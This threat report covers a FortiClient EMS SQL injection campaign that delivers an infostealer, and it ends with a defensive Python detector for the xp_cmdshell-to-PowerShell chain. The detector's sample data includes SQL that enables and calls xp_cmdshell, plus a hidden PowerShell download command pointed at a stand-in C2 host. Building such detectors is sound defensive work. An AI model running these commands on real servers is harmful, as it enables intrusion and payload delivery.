Recent investigative reports have uncovered a sophisticated campaign that leverages a critical SQL injection vulnerability in the FortiClient Endpoint Management Server to deliver the EKZ infostealer. The flaw allows remote, unauthenticated attackers to execute arbitrary code with system-level privileges, bypassing the security layers organizations typically rely on for endpoint protection. By sending specially crafted requests to the server's listening port, adversaries trigger a defect in the database interaction layer that leads to the execution of commands through the Windows Command Processor. This intrusion set stands out for its reliance on living-off-the-land techniques: legitimate administrative tools fetch the primary malware payload without triggering immediate behavioral alerts. The transition from initial access to data exfiltration is remarkably fast, underscoring the severe risk to unpatched instances of the management server that remain exposed on the internet.
Tactical Execution: From Initial Exploitation to Malicious Deployment
The exploitation process began when the vulnerable Endpoint Management Server received a malicious request targeting the Endpoint Control service, which failed to sanitize user input before passing it to the backend database. This failure enabled the attacker to inject SQL statements that invoked the xp_cmdshell stored procedure, which executes operating system commands directly from the database engine. Analysts identified the Data Analyzer Service as the primary affected component, since it handled incoming requests from remote clients without sufficient validation. By manipulating the parameters sent to this service, the threat actors executed arbitrary code with the privileges of the service account, which typically holds high-level system access. The attack passed through traditional firewall rules because the malicious traffic mimicked legitimate administrative communication, making it hard to detect with simple signature-based inspection.
Once the initial foothold was established, the threat actor utilized a PowerShell script to reach out to a remote command-and-control server, fetching the EKZ infostealer executable. This malware was specifically designed to harvest a wide array of sensitive information, including browser credentials, stored cookies, and session tokens from various communication platforms. Furthermore, the stealer actively searched for cryptocurrency wallet files and multi-factor authentication secrets, which were then compressed and exfiltrated to the attacker’s infrastructure. The delivery mechanism often involved secondary obfuscated scripts intended to evade endpoint detection and response solutions by performing memory-only execution. This sequence demonstrated a high degree of automation and precision in modern cyberattacks, allowing adversaries to move from initial breach to full data exfiltration in less than an hour, significantly reducing the window for effective manual intervention by security teams.
The response to these incidents emphasized the critical importance of maintaining rigorous patch management protocols and implementing robust network segmentation to contain potential breaches. Security teams observed that organizations which prioritized the rapid deployment of official security updates successfully neutralized the threat before the infostealer could execute its data collection routines. Additionally, the implementation of application control policies proved effective in blocking the unauthorized PowerShell scripts used during the delivery phase. Analysts noted that the integration of behavioral monitoring tools allowed for the early detection of the anomalous SQL queries and subsequent command executions. By analyzing the forensic evidence from compromised systems, it was determined that a proactive defense strategy, centered on least-privilege access and continuous auditing of server-side interactions, remained the most viable path to resilience. These findings prompted administrators to enforce strict egress filtering.
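The behavioral monitoring the report credits with early detection rests on two observations: xp_cmdshell being enabled or invoked in query text, and a shell or PowerShell process appearing beneath the SQL Server engine, possibly followed by a download cradle. The following script is an added example written for this article, not code from the report or from Fortinet; it runs the corresponding checks over constructed SQL audit statements and process-creation records whose field names (process_guid, parent_guid, image, parent_image, command_line) are assumptions modelled on Sysmon Event ID 1. The ancestry walk is what catches the chain described above even when PowerShell is launched by an intermediate cmd.exe rather than directly by sqlservr.exe.

```python
"""Detection logic for the xp_cmdshell -> cmd.exe -> PowerShell chain.
Added example; sample records below are constructed, not captured telemetry."""
import re
from dataclasses import dataclass

# Query-text rules, checked in order so enablement is reported before use.
SQL_PATTERNS = [
    ("sql.xp_cmdshell_enable", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("sql.advanced_options", re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)),
    ("sql.xp_cmdshell_exec", re.compile(r"\bxp_cmdshell\b", re.I)),
]
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DB_ENGINE = "sqlservr.exe"
# Lower-cased substrings typical of a PowerShell download cradle.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "-enc ", "bitsadmin")


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_sql(statement: str):
    """Return a Finding for the first matching query-text rule, else None."""
    for rule, pat in SQL_PATTERNS:
        if pat.search(statement):
            return Finding(rule, statement.strip())
    return None


def build_process_tree(proc_events):
    """Map process_guid -> (image basename, parent_guid)."""
    return {ev["process_guid"]: (_basename(ev["image"]), ev.get("parent_guid"))
            for ev in proc_events}


def descends_from(tree, guid, ancestor_image, max_depth=16):
    """True if any ancestor of guid (not guid itself) has the given image."""
    cur = tree.get(guid, (None, None))[1]
    for _ in range(max_depth):
        if cur is None or cur not in tree:
            return False
        image, parent = tree[cur]
        if image == ancestor_image:
            return True
        cur = parent
    return False


def check_processes(proc_events):
    tree = build_process_tree(proc_events)
    findings = []
    for ev in proc_events:
        image = _basename(ev["image"])
        if image in SHELL_IMAGES and descends_from(tree, ev["process_guid"], DB_ENGINE):
            parent = _basename(ev.get("parent_image", ""))
            findings.append(Finding("proc.shell_under_sqlservr", f"{parent} -> {image}"))
        cmdline = ev.get("command_line", "").lower()
        if image in {"powershell.exe", "pwsh.exe"} and any(m in cmdline for m in CRADLE_MARKERS):
            findings.append(Finding("proc.powershell_download_cradle", ev["command_line"]))
    return findings


def analyze(sql_statements, proc_events):
    findings = [f for f in (check_sql(s) for s in sql_statements) if f]
    findings.extend(check_processes(proc_events))
    return findings


# Constructed sample input: one benign query, then the enable-and-execute sequence.
SAMPLE_SQL = [
    "SELECT name FROM endpoints WHERE id = 42",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "EXEC master..xp_cmdshell 'whoami'",
]
# Constructed process tree: sqlservr -> cmd -> powershell (cradle), plus a benign admin script.
SAMPLE_PROCS = [
    {"process_guid": "P1", "parent_guid": "P0", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "command_line": "sqlservr.exe"},
    {"process_guid": "P2", "parent_guid": "P1", "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"process_guid": "P3", "parent_guid": "P2", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command Invoke-WebRequest "
                     "-Uri http://c2.example.invalid/stage -OutFile C:\\ProgramData\\stage.exe"},
    {"process_guid": "P4", "parent_guid": "P9", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_SQL, SAMPLE_PROCS):
        print(f"{f.rule:34} {f.evidence}")
```

Against the sample input the script reports the two sp_configure changes, the xp_cmdshell call, the cmd.exe and powershell.exe processes descending from sqlservr.exe, and the Invoke-WebRequest cradle, while the backup script launched from explorer.exe produces no finding. In production the same rules map onto SQL Server audit or Extended Events data and Sysmon or Security 4688 process telemetry; the engine-spawns-shell rule is the higher-fidelity signal, since a database engine on an EMS host has no legitimate reason to launch cmd.exe.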